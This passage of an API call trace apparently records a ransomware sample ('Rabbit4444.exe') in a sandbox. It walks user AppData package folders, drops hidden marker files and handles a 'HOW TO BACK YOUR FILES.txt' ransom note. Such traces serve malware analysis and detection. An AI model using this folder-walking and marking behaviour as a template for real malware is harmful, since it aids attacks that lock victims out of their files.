ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.380] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.380] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.380] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.380] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.380] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.380] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb1836d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb1836d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.380] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.380] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.380] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb1836d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb1836d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.380] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.380] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.381] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.381] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.381] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.381] CloseHandle (hObject=0x2a0) returned 1 [0064.381] CloseHandle (hObject=0x2cc) returned 1 [0064.382] GetCurrentThreadId () returned 0xd98 [0064.382] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0064.382] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies" [0064.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e158 | out: hHeap=0xe0000) returned 1 [0064.382] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0064.382] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies" [0064.382] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\" [0064.382] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0064.382] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.383] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.387] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.388] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.388] CloseHandle (hObject=0x2cc) returned 1 [0064.388] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies") returned 95 [0064.388] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.389] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e892a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0064.389] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.389] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.389] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.389] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.389] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e892a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.389] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.389] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.389] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.389] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.389] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.389] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb1836d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb1836d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb3e592, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.389] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.389] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.389] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb1836d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb1836d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb3e592, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.389] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0064.389] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.389] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.390] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.390] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.391] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.391] CloseHandle (hObject=0x2a0) returned 1 [0064.391] CloseHandle (hObject=0x2cc) returned 1 [0064.391] GetCurrentThreadId () returned 0xd98 [0064.391] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0064.391] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache" [0064.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0064.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0064.391] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache" [0064.391] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\" [0064.391] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0064.391] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.392] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.394] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.395] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.395] CloseHandle (hObject=0x2cc) returned 1 [0064.396] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache") returned 93 [0064.396] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.396] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e7f89, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefb3e592, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.396] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.396] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.396] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.396] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.396] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e7f89, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefb3e592, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.396] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.396] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.396] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.396] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.396] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.396] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb3e592, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb3e592, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb3e592, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.397] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.397] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.397] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb3e592, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb3e592, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb3e592, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.397] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.397] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.397] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.397] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.397] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.398] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.398] CloseHandle (hObject=0x2a0) returned 1 [0064.398] CloseHandle (hObject=0x2cc) returned 1 [0064.398] GetCurrentThreadId () returned 0xd98 [0064.398] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11d028 [0064.398] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe" [0064.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e0b0 | out: hHeap=0xe0000) returned 1 [0064.398] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d020 | out: hHeap=0xe0000) returned 1 [0064.398] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe" [0064.398] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\" [0064.398] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0064.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.401] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.404] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.404] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.405] CloseHandle (hObject=0x2cc) returned 1 [0064.405] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe") returned 76 [0064.405] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8769207c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefb64873, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.405] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.405] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.405] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.405] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.405] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8769207c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefb64873, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.405] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.405] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.405] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.405] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.406] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.406] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefb64873, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefb64873, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb64873, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.406] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.406] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.406] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea147891, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x37de8088, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x37de8088, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0064.406] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.406] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.406] lstrcmpiW (lpString1="AC", 